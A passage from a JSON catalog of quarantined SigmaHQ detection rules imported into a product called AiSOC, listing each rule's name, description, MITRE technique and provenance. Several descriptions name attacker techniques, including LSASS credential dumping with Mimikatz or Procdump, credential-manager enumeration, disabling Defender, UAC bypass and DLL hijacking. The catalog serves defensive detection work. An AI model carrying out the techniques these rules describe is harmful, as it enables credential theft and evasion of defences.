"upstream_path": "rules/network/cisco/aaa/cisco_cli_moving_data.yml" } }, { "id": "sigmahq-sigma-5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", "type": "detection", "name": "Suspicious Parent Double Extension File Execution", "description": "Detect execution of suspicious double extension files in ParentCommandLine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-parent-double-extension-file-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml" } }, { "id": "sigmahq-sigma-5e95028c-5229-4214-afae-d653d573d0ec", "type": "detection", "name": "Security Service Disabled Via Reg.EXE", "description": "Detects execution of \"reg.exe\" to disable security services such as Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-service-disabled-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5e95028c-5229-4214-afae-d653d573d0ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml" } }, { "id": "sigmahq-sigma-5e993621-67d4-488a-b9ae-b420d08b96cb", "type": "detection", "name": "Service Installation in Suspicious Folder", "description": "Detects service installation in suspicious folder appdata", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-installation-in-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5e993621-67d4-488a-b9ae-b420d08b96cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder.yml" } }, { "id": "sigmahq-sigma-5edc2273-c26f-406c-83f3-f4d948e740dd", "type": "detection", "name": "Indirect Inline Command Execution Via Bash.EXE", "description": "Detects execution of Microsoft bash launcher with the \"-c\" flag.\nThis can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/indirect-inline-command-execution-via-bash-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5edc2273-c26f-406c-83f3-f4d948e740dd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bash_command_execution.yml" } }, { "id": "sigmahq-sigma-5ee3a654-372f-11ec-8d3d-0242ac130003", "type": "detection", "name": "ADCS Certificate Template Configuration Vulnerability", "description": "Detects certificate creation with template allowing risk permission subject", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/adcs-certificate-template-configuration-vulnerability.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5ee3a654-372f-11ec-8d3d-0242ac130003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" } }, { "id": "sigmahq-sigma-5ef9853e-4d0e-4a70-846f-a9ca37d876da", "type": "detection", "name": "Potential Credential Dumping Activity Via LSASS", "description": "Detects process access requests to the LSASS process with specific call trace calls and access masks.\nThis behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-activity-via-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_memdump.yml" } }, { "id": "sigmahq-sigma-5f03babb-12db-4eec-8c82-7b4cb5580868", "type": "detection", "name": "Response File Execution Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file which might contain a malicious action.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/response-file-execution-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f03babb-12db-4eec-8c82-7b4cb5580868", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml" } }, { "id": "sigmahq-sigma-5f1573a7-363b-4114-9208-ad7a61de46eb", "type": "detection", "name": "ESXi VM List Discovery Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"vm\" flag in order to retrieve information about the installed VMs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1007", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-vm-list-discovery-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f1573a7-363b-4114-9208-ad7a61de46eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml" } }, { "id": "sigmahq-sigma-5f521e4b-0105-4b72-845b-2198a54487b9", "type": "detection", "name": "Users Authenticating To Other Azure AD Tenants", "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/users-authenticating-to-other-azure-ad-tenants.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f521e4b-0105-4b72-845b-2198a54487b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_users_authenticating_to_other_azure_ad_tenants.yml" } }, { "id": "sigmahq-sigma-5f60740a-f57b-4e76-82a1-15b6ff2cb134", "type": "detection", "name": "Registry Modification Via Regini.EXE", "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-modification-via-regini-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regini_execution.yml" } }, { "id": "sigmahq-sigma-5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "type": "detection", "name": "RDP Over Reverse SSH Tunnel", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-over-reverse-ssh-tunnel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" } }, { "id": "sigmahq-sigma-5f6a601c-2ecb-498b-9c33-660362323afa", "type": "detection", "name": "Root Certificate Installed From Susp Locations", "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/root-certificate-installed-from-susp-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f6a601c-2ecb-498b-9c33-660362323afa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml" } }, { "id": "sigmahq-sigma-5f87308a-0a5b-4623-ae15-d8fa1809bc60", "type": "detection", "name": "Suspicious Files in Default GPO Folder", "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-files-in-default-gpo-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml" } }, { "id": "sigmahq-sigma-5f92fff9-82e2-48eb-8fc1-8b133556a551", "type": "detection", "name": "Remote Encrypting File System Abuse", "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-encrypting-file-system-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f92fff9-82e2-48eb-8fc1-8b133556a551", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" } }, { "id": "sigmahq-sigma-5f9c7f1a-7c21-4c39-b2f3-8d8006e0e51f", "type": "detection", "name": "PowerShell Web Access Installation - PsScript", "description": "Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-web-access-installation-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f9c7f1a-7c21-4c39-b2f3-8d8006e0e51f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_powershell_web_access_installation.yml" } }, { "id": "sigmahq-sigma-5f9db380-ea57-4d1e-beab-8a2d33397e93", "type": "detection", "name": "UAC Bypass Using Windows Media Player - Registry", "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-windows-media-player-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" } }, { "id": "sigmahq-sigma-5fc297ae-25b6-488a-8f25-cc12ac29b744", "type": "detection", "name": "Potentially Suspicious Usage Of Qemu", "description": "Detects potentially suspicious execution of the Qemu utility in a Windows environment.\nThreat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-usage-of-qemu.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5fc297ae-25b6-488a-8f25-cc12ac29b744", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_qemu_suspicious_execution.yml" } }, { "id": "sigmahq-sigma-5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af", "type": "detection", "name": "Mstsc.EXE Execution With Local RDP File", "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mstsc-exe-execution-with-local-rdp-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml" } }, { "id": "sigmahq-sigma-6004abd0-afa4-4557-ba90-49d172e0a299", "type": "detection", "name": "Execute Pcwrun.EXE To Leverage Follina", "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-pcwrun-exe-to-leverage-follina.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6004abd0-afa4-4557-ba90-49d172e0a299", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" } }, { "id": "sigmahq-sigma-60167e5c-84b2-4c95-a7ac-86281f27c445", "type": "detection", "name": "Remote PowerShell Session (PS Classic)", "description": "Detects remote PowerShell sessions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-powershell-session-ps-classic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60167e5c-84b2-4c95-a7ac-86281f27c445", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" } }, { "id": "sigmahq-sigma-602a1f13-c640-4d73-b053-be9a2fa58b96", "type": "detection", "name": "HackTool - Powerup Write Hijack DLL", "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-powerup-write-hijack-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "602a1f13-c640-4d73-b053-be9a2fa58b96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml" } }, { "id": "sigmahq-sigma-602f5669-6927-4688-84db-0d4b7afb2150", "type": "detection", "name": "Disable Powershell Command History", "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-powershell-command-history.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "602f5669-6927-4688-84db-0d4b7afb2150", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" } }, { "id": "sigmahq-sigma-603c6630-5225-49c1-8047-26c964553e0e", "type": "detection", "name": "Enumerate Credentials from Windows Credential Manager With PowerShell", "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enumerate-credentials-from-windows-credential-manager-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "603c6630-5225-49c1-8047-26c964553e0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" } }, { "id": "sigmahq-sigma-60936b49-fca0-4f32-993d-7415edcf9a5d", "type": "detection", "name": "New Application in AppCompat", "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-application-in-appcompat.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60936b49-fca0-4f32-993d-7415edcf9a5d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" } }, { "id": "sigmahq-sigma-60bfeac3-0d35-4302-8efb-1dd16f715bc6", "type": "detection", "name": "Suspicious SysAidServer Child", "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-sysaidserver-child.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml" } }, { "id": "sigmahq-sigma-60de9b57-dc4d-48b9-a6a0-b39e0469f876", "type": "detection", "name": "Disabling Multi Factor Authentication", "description": "Detects disabling of Multi Factor Authentication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabling-multi-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60de9b57-dc4d-48b9-a6a0-b39e0469f876", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/audit/microsoft365_disabling_mfa.yml" } }, { "id": "sigmahq-sigma-60f16a96-db70-42eb-8f76-16763e333590", "type": "detection", "name": "New Capture Session Launched Via DXCap.EXE", "description": "Detects the execution of \"DXCap.EXE\" with the \"-c\" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-capture-session-launched-via-dxcap-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60f16a96-db70-42eb-8f76-16763e333590", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dxcap_arbitrary_binary_execution.yml" } }, { "id": "sigmahq-sigma-60f1ce20-484e-41bd-85f4-ac4afec2c541", "type": "detection", "name": "GUI Input Capture - macOS", "description": "Detects attempts to use system dialog prompts to capture user credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1056.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gui-input-capture-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60f1ce20-484e-41bd-85f4-ac4afec2c541", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" } }, { "id": "sigmahq-sigma-60f6535a-760f-42a9-be3f-c9a0a025906e", "type": "detection", "name": "Use of Legacy Authentication Protocols", "description": "Alert on when legacy authentication has been used on an account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-legacy-authentication-protocols.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60f6535a-760f-42a9-be3f-c9a0a025906e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_legacy_authentication_protocols.yml" } }, { "id": "sigmahq-sigma-60fc936d-2eb0-4543-8a13-911c750a1dfc", "type": "detection", "name": "Interactive AT Job", "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/interactive-at-job.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml" } }, { "id": "sigmahq-sigma-6104e693-a7d6-4891-86cb-49a258523559", "type": "detection", "name": "Bash Interactive Shell", "description": "Detects execution of the bash shell with the interactive flag \"-i\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bash-interactive-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6104e693-a7d6-4891-86cb-49a258523559", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml" } }, { "id": "sigmahq-sigma-61171ffc-d79c-4ae5-8e10-9323dba19cd3", "type": "detection", "name": "Azure 